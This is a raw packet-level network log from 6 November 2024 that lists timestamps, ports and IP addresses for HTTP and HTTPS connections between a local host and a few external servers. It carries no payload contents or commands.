Nov 6, 2024 17:02:47.745961905 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.746051073 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.746058941 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.746387959 CET	56845	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.746392965 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.746473074 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.746476889 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.762403965 CET	443	56849	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:47.764683008 CET	56849	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:47.764699936 CET	443	56849	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:47.779933929 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:47.783888102 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:47.788769007 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:47.860061884 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.860145092 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.860301971 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.860449076 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.860471964 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.860481977 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.860487938 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.862966061 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.862996101 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.863079071 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.863193035 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.863208055 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.872545958 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.872766018 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.872819901 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.872859001 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.872876883 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.872888088 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.872894049 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.873567104 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.874156952 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.874202967 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.874228954 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.874239922 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.874248981 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.874253988 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.875109911 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.875123024 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.875283957 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.875408888 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.875420094 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.875755072 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.876029015 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.876077890 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.876091957 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.876100063 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.876108885 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.876112938 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.876883030 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.876890898 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.877011061 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.877114058 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.877123117 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.877974987 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.877995014 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.878060102 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.878161907 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.878173113 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.881568909 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.881889105 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.881952047 CET	56845	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.881966114 CET	56845	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.881972075 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.881995916 CET	56845	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.881999969 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.883862019 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.883868933 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.883966923 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.884077072 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.884085894 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.919703960 CET	443	56849	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:47.919775009 CET	443	56849	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:47.919835091 CET	56849	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:47.920270920 CET	56849	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:47.923906088 CET	56841	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:47.925062895 CET	56856	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:47.929326057 CET	80	56841	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:47.929371119 CET	56841	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:47.929924965 CET	80	56856	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:47.929996967 CET	56856	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:47.930090904 CET	56856	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:47.934866905 CET	80	56856	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:48.030507088 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:48.074126959 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.074151039 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:48.074224949 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.078587055 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.078597069 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:48.224050045 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:48.614645958 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.615004063 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.621594906 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.623557091 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.641586065 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.641608953 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.645483971 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.645488977 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.653016090 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.653024912 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.657613039 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.657618999 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.677210093 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.713579893 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.713606119 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.717365980 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.717371941 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.717753887 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.717778921 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.718245029 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.718250036 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.734371901 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:48.734447002 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.767699003 CET	80	56856	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:48.770385981 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.770982027 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.771061897 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.772913933 CET	56858	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.772950888 CET	443	56858	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:48.773032904 CET	56858	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.773313999 CET	56858	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.773324013 CET	443	56858	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:48.776379108 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.776410103 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.776427031 CET	56854	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.776432991 CET	443	56854	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.780982971 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.781039953 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.781090021 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.789874077 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.789897919 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.789912939 CET	56853	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.789918900 CET	443	56853	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.817797899 CET	56856	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:48.842746019 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.842809916 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.842938900 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.844577074 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.844954967 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.845881939 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.887593985 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.887639046 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.887655973 CET	56855	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.887662888 CET	443	56855	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.889209986 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.889209986 CET	56851	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.889235973 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.889246941 CET	443	56851	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.890264034 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:48.890286922 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:48.890628099 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:48.892026901 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.892066002 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.892117977 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.893695116 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.893711090 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.898324013 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.898355961 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:48.898416996 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.898947954 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:48.898971081 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.036536932 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:49.209569931 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.209621906 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.209685087 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.210526943 CET	56862	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.210578918 CET	443	56862	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.210624933 CET	56862	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.228791952 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.228812933 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.229070902 CET	56862	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.229094028 CET	443	56862	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.391725063 CET	443	56858	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:49.393695116 CET	56858	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:49.393728971 CET	443	56858	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:49.559844971 CET	443	56858	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:49.559931993 CET	443	56858	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:49.559969902 CET	56858	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:49.560689926 CET	56858	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:49.564651966 CET	56856	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:49.566005945 CET	56864	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:49.569946051 CET	80	56856	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:49.569992065 CET	56856	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:49.571082115 CET	80	56864	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:49.571141005 CET	56864	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:49.571244955 CET	56864	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:49.576134920 CET	80	56864	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:49.619774103 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.621393919 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.621414900 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.622222900 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.622227907 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.633713007 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.634047985 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.634061098 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.634462118 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.634464979 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.646945953 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:49.656512022 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.656867027 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.656896114 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.657305956 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.657314062 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.691327095 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:49.752587080 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.752652884 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.752691984 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.753171921 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.753189087 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.753207922 CET	56860	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.753215075 CET	443	56860	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.756423950 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.756458044 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.756534100 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.756655931 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.756664038 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.766444921 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.766971111 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.767020941 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.767111063 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.767131090 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.767146111 CET	56859	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.767152071 CET	443	56859	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.769423962 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.769470930 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.769524097 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.769660950 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.769674063 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.791935921 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.792051077 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.792107105 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.792309999 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.792324066 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.792339087 CET	56852	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.792344093 CET	443	56852	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.795281887 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.795321941 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.795389891 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.795559883 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:49.795567036 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:49.796036959 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:49.796128035 CET	443	56857	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:49.796174049 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:49.799810886 CET	56857	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:49.804191113 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:49.809091091 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:50.287190914 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:50.288029909 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:50.288091898 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:50.288569927 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.290314913 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.290342093 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.293836117 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.293840885 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.295183897 CET	56868	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:50.295213938 CET	443	56868	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:50.295293093 CET	56868	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:50.295535088 CET	56868	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:50.295552969 CET	443	56868	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:50.397782087 CET	80	56864	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:50.399274111 CET	56869	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:50.399336100 CET	443	56869	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:50.399914026 CET	56869	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:50.400147915 CET	56869	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:50.400157928 CET	443	56869	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:50.425235033 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.425483942 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.425733089 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.425733089 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.425795078 CET	56861	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.425812006 CET	443	56861	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.428672075 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.428709030 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.429925919 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.430016994 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.430026054 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.497684002 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.500411034 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.500411987 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.500457048 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.500472069 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.529516935 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.530472040 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.530472040 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.530507088 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.530523062 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.536686897 CET	56864	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:50.543325901 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.543806076 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.543831110 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.545840979 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.545847893 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.627862930 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.627932072 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.627999067 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.628227949 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.628227949 CET	56865	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.628247023 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.628256083 CET	443	56865	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.631092072 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.631128073 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.631268024 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.631508112 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.631520987 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.684722900 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.686253071 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.686400890 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.686454058 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.686454058 CET	56866	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.686467886 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.686477900 CET	443	56866	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.689070940 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.689095974 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.689409018 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.689960957 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.689974070 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.768556118 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.768666029 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.768742085 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.769095898 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.769100904 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.769129038 CET	56867	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.769131899 CET	443	56867	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.771650076 CET	56873	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.771703005 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.771857023 CET	56873	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.771940947 CET	56873	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:50.771949053 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:50.900100946 CET	443	56868	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:50.915188074 CET	56868	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:50.915215015 CET	443	56868	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.012209892 CET	443	56869	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.021519899 CET	56869	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:51.021553993 CET	443	56869	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.072385073 CET	443	56868	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.072473049 CET	443	56868	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.074955940 CET	56868	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:51.075417042 CET	56868	443	192.168.2.6	188.114.96.3
